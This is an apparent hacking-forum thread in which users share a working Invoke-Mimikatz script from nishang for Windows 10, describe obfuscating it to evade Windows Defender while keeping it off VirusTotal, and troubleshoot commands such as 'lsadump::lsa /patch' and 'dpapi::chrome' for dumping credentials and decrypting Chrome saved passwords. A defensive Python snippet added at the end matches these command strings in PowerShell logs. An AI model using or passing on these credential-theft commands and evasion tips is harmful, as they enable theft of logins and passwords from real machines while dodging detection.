
For those who like Invoke-Mimikatz (Works with Win10)


PoSHMagiC0de


On 9/4/2020 at 5:49 PM, kuyaya said:

Hey all

For anyone still searching for a solution, I found one!

I've been searching for a working solution just to dump the logon hashes with powershell. Haven't found a working one, but instead found a working invoke-mimikatz! The one from PowerSploit and Empire doesn't work, but the one from nishang does. Link: https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1

Time to obfuscate it...

Update (09.09, 23:41 CEST): Successfully obfuscated! I tested it on the latest win10 (version 1903 build 18362.1016). AV was Windows Defender, so it also shouldn't get detected by other AVs. I'm obviously not gonna upload it to virustotal, I don't want that script to be detectable 1 week later...

GL to all who also try it, it's totally possible.

OMG, THANK YOU

After hours of searching for a solution, that one worked! You rock 👍


On 12/29/2020 at 7:13 PM, eeeeeesy said:

I also tried nishang's mimikatz with the command

Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

 

But I get this error about /unprotect so it's not decrypting the login data from chrome.

Invoke-Mimikatz : A positional parameter cannot be found that accepts argument '/unprotect'.
At C:\Users\user4\Desktop\newest working mimikats by nishang\Invoke-Mimikatz.ps1:2754 char:1
+ Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chr ...

 

Could you tell me what I'm doing wrong?

Yes, you're using the commands wrong.

If you want to execute an Invoke-Mimikatz command with spaces, you have to enclose it like that:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

However, this doesn't work for commands which require quotes in the command, like the dpapi::chrome does. I'll search for something which works.
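
A defender-side view of the command strings discussed in this thread, as an added example that is not part of the original posts: the `module::command` token still appears in PowerShell script block logging (Event ID 4104) text whatever the wrapper function is called, so it can be matched directly. The module list is a partial, assumed set, and the events and the wrapper name `Get-Thing` are constructed for illustration.

```python
import re

# Partial list of mimikatz module names (assumption: extend for your environment).
MODULES = ("sekurlsa", "lsadump", "dpapi", "kerberos",
           "vault", "token", "privilege", "crypto")

# Match "module::command" anywhere in the text, independent of the wrapper
# function's name. The lookbehind skips PowerShell static calls such as
# [Some.Type]::Member, where "::" follows a closing bracket.
CMD_RE = re.compile(r"(?<![\w\]])(" + "|".join(MODULES) + r")::(\w+)",
                    re.IGNORECASE)


def find_module_commands(script_text):
    """Return sorted, de-duplicated lowercase 'module::command' tokens."""
    return sorted({f"{m.group(1)}::{m.group(2)}".lower()
                   for m in CMD_RE.finditer(script_text)})


def scan_events(events):
    """Return {RecordId: [tokens]} for events whose script text has hits."""
    findings = {}
    for ev in events:
        hits = find_module_commands(ev.get("ScriptBlockText", ""))
        if hits:
            findings[ev["RecordId"]] = hits
    return findings


# Constructed sample records shaped like exported Event ID 4104 entries
# (not real log data). Record 102 uses a made-up wrapper name.
SAMPLE_EVENTS = [
    {"RecordId": 101,
     "ScriptBlockText": "Invoke-Mimikatz -Command '\"lsadump::lsa /patch\"'"},
    {"RecordId": 102,
     "ScriptBlockText": "Get-Thing -Command '\"DPAPI::chrome /unprotect\"'"},
    {"RecordId": 103,
     "ScriptBlockText": "[System.IO.File]::ReadAllText('C:\\temp\\notes.txt')"},
]

if __name__ == "__main__":
    for record_id, tokens in scan_events(SAMPLE_EVENTS).items():
        print(record_id, tokens)
```
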


Archived

This topic is now archived and is closed to further replies.
